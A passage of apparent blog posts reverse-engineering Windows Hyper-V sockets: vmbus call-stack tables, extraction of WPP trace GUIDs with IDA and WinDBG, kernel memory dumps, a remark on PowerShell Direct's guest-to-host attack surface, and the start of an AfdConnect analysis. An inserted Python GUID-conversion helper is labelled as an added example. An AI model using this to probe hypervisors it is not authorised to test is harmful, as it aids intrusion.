</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">3</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">3</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeMonitor</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="17" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">winhvr!WinHvConnectPort</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ParentConnectDedicated</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ParentClaimInterruptRe</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!XPartCreateInterrupt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WS2_32!WSAConnect</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1c</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1000b</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeEvent</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="18" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">winhvr!WinHvCreatePort</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ParentClaimInterruptR</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!XPartCreateInterrupt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WS2_32!WSAConnect</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1d</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1000c</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeEvent</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5</span></div>
</td></tr>
</tbody></table>
</div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After that, the overall picture becomes clearer: when Enter-PSSession is executed in the guest OS, registration of a new interface for the vmbus driver is initiated. That operation leads to the start of the vmicsession service, which starts a powershell process with the credentials transferred from the root OS; this process opens Hyper-V sockets and begins communicating with powershell.exe running in the root OS using </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">send</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">recv</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> calls.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Additionally, I think it should be noted that some of the execution logic of drivers (hvsocket.sys in our case) can be learned using the Windows software trace preprocessor (WPP).</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Many drivers developed by Microsoft use WPP, and the traceview utility from the WDK lets you view it. For this purpose it is necessary to know the trace GUID. If you look in IDA, the name of the variable containing that GUID looks like WPP_ThisDir_CTLGUID_HvSocketTraceGuid or WPP_ThisDir_CTLGUID_VMBusDriverTraceGuid (for the vmbus driver). The GUID appears there in binary form: 0B8A5B44354C0BBA849083340689010E5h. It needs to be converted into the usual format (689010e5-3340-4908-a8bb-c05443b4a5b8), for instance by running </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">dt _GUID &lt;variable address&gt;</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> in WinDBG.</span></div>
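A small helper for the GUID conversion just described, added here as an example (it is not code from the original post). It turns the little-endian integer IDA shows for the GUID variable into the canonical string TraceView expects, parses the same 16 bytes out of a WinDBG dc line, and also goes the other way to produce the literal or byte pattern to look for in a listing or memory dump. The function names are our own; the sample GUID is the hvsocket.sys one quoted above, and the dc line is constructed.

```python
"""Convert a WPP control GUID between the raw form seen in IDA/WinDBG and
the canonical string. Added example, not code from the post."""
import re
import uuid

# Quoted in the post: the GUID variable's 16 bytes read by IDA as one
# little-endian integer (MASM notation: leading 0, trailing h).
IDA_LITERAL = "0B8A5B44354C0BBA849083340689010E5h"
CANONICAL = "689010e5-3340-4908-a8bb-c05443b4a5b8"


def guid_from_ida_literal(text: str) -> str:
    """IDA little-endian integer literal -> canonical GUID string.

    uuid.UUID(bytes_le=...) applies the Windows GUID layout: Data1, Data2
    and Data3 are little-endian, the eight Data4 bytes stay in memory order.
    """
    digits = text.strip().rstrip("hH")
    if not re.fullmatch(r"[0-9A-Fa-f]+", digits):
        raise ValueError(f"not a hex literal: {text!r}")
    value = int(digits, 16)
    if value >= 1 << 128:
        raise ValueError("literal wider than 128 bits")
    return str(uuid.UUID(bytes_le=value.to_bytes(16, "little")))


def guid_from_dc_line(line: str) -> str:
    """Canonical GUID from one WinDBG 'dc' output line showing the variable.

    'dc' prints four DWORDs, each already byte-swapped to host order, so
    re-emitting each as little-endian restores the memory image.
    """
    m = re.match(r"\s*[0-9a-f`]+\s+((?:[0-9a-f]{8}\s+){3}[0-9a-f]{8})", line, re.I)
    if not m:
        raise ValueError(f"not a dc line: {line!r}")
    dwords = [int(w, 16) for w in m.group(1).split()]
    raw = b"".join(d.to_bytes(4, "little") for d in dwords)
    return str(uuid.UUID(bytes_le=raw))


def ida_literal_from_guid(guid: str) -> str:
    """Canonical GUID -> the literal IDA shows for the variable, for matching
    a known provider GUID against a listing (MASM style: leading 0 when the
    first digit is a letter, trailing h)."""
    value = int.from_bytes(uuid.UUID(guid).bytes_le, "little")
    digits = f"{value:032X}"
    if not digits[0].isdigit():
        digits = "0" + digits
    return digits + "h"


def memory_pattern(guid: str) -> str:
    """The GUID's bytes in memory order, space separated, e.g. as the
    pattern argument of a WinDBG 's -b' search."""
    return " ".join(f"{b:02x}" for b in uuid.UUID(guid).bytes_le)


if __name__ == "__main__":
    print(guid_from_ida_literal(IDA_LITERAL))
    # Constructed dc line: the same 16 bytes as WinDBG would display them.
    print(guid_from_dc_line("ffff9d0c`35126700 689010e5 49083340 54c0bba8 b8a5b443  ...."))
    print(ida_literal_from_guid(CANONICAL))
    print(memory_pattern(CANONICAL))
```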
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The resulting GUID can be entered into TraceView when a new session is started: File -> Create New Log Session -> Add Provider -></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="237" src="https://lh6.googleusercontent.com/EROwx2tWrgcM1jPsOHaxqCH0lGfTAUh4parwKVyL5T7CZkQ0wVv-6I12rAZIchedmZDMEaxKAy9mILGfJyv3WR8w-lasjE83pB0sEuppgrZg710GRTcs2Fpjs8sSDn9VwrPxPSc5eL7nHCKxkg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="210" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then specify the path to the file into which the data will be written. The resulting picture is not very informative (Microsoft does not provide a TMF file for decoding):</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="193" src="https://lh3.googleusercontent.com/nUhe0h4qQX-QgW8KjDDKcGJ0hH5wQrirDdVgs72qWT0jCRAyJ1uh_6T1b85G4hAewCyHXJQzzYJ_PBzWNe-7xxdM_y-J0NgeFwR6lMCdpqJB40Ft3Xv4lS3-CImKxX5VfUxbFl2JeiSOehbNKA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="490" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">But if we load the saved etl file into Windows Message Analyzer, we will be able to see the PID and TID, and also the WPP message in raw form:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="163" src="https://lh4.googleusercontent.com/p5fS3MI8LKGZlEsDYPV1iuB99r9rBdKkxgEiCE5vbK_jUA9v4tezi5rZx8rW_f4c6VMRNFt2zVQ-AW7mkEIDew9lfRqa_XKPG7SVsfVwhHPCLLO_Bo8U0NLhwrXioTHv22LwhxXWkuK0AUn8rA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="552" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We can see what those addresses contain using WinDBG (similar binary values were encountered at the socket initialization stage):</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dc FFFF9D0C351266C0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9d0c`351266c0 00000001 00000000 00000004 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9d0c`351266d0 00000001 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9d0c`351266e0 00000000 00000000 00060001 00000000 ................</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dc FFFF9D0C34A9C340</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9d0c`34a9c340 00000001 00000000 00000003 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9d0c`34a9c350 00000001 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff9d0c`34a9c360 00000000 00000000 00060001 00000000 ................</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In general, it is possible to conclude that PowerShell Direct was created for cases where the Hyper-V administrator and the administrator of the virtual server are the same person. A variety of data flows from the guest OS into the host OS and is processed by powershell.exe started with Hyper-V Administrator privileges (a requirement for PowerShell Direct to work). Of course, it is unlikely that by sending messages with the &lt;cmd&gt; tag to the root OS we could execute arbitrary commands, but the fact that vulnerabilities are found in the dependent Windows components (.NET, XML) more often than in the hypervisor module is clearly visible, for example, in the NVD database. However, specific conditions of use are necessary for such vulnerabilities, should they exist, and these can make them unusable (the configuration: a terminal XenApp\RDS server on which a user can obtain local administrator privileges and on which the Hyper-V administrator uses PowerShell Direct). </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<br /><ol start="5" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Conclusion</span></div>
</li>
</ol>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In this article we considered some aspects of how Hyper-V sockets work. From the results it can be understood that, from an architectural point of view, they differ little from ordinary network sockets; however, to support them certain changes were made to the Windows network stack components. In my opinion, it is the first documented channel for data exchange between guest and host operating systems in the Hyper-V virtualization environment. It can be used, for example, for data exchange between a USB device connected to the root OS and the guest OS, which is quite useful for hardware protection dongles or two-factor authentication at operating system logon. Certainly, in the example given above it is used only to demonstrate how they work. How this data transmission mechanism will behave for multithreaded applications with several channels, or when transferring large volumes of data, is difficult to say at present. Let's see whether developers will use the opportunity for communication between guest and host OS provided by Microsoft.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">P.S. <a href="https://bit.ly/3DBeUa4">PDF version</a> </span></div>
</div>
Hyper-V sockets and AfdConnect (Gerhart X, 2017-06-23)<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> When we use sockets and call the connect function, it calls mswsock!WSPConnect, which in turn calls NtDeviceIoControlFile. NtDeviceIoControlFile has the following prototype (the values observed for the connect call are noted next to each parameter):</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NTSTATUS WINAPI NtDeviceIoControlFile(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE FileHandle, - point to \Device\Afd</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE Event,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PIO_APC_ROUTINE ApcRoutine, - 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID ApcContext, - 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PIO_STATUS_BLOCK IoStatusBlock,- 0036F4C0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG IoControlCode – 00012007 - IOCTL code</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID InputBuffer,- 0036F4E8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">InputBufferLength</span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, 30</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PVOID OutputBuffer,- 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG OutputBufferLength - 0</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NtDeviceIoControlFile goes on to execute the afd!AfdConnect function. It analyzes InputBufferLength and, if it is above the AfdStandardAddressLength constant (equal to 0x1C in Windows Server 2016), the function calls nt!ExAllocatePoolWithTagPriority:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
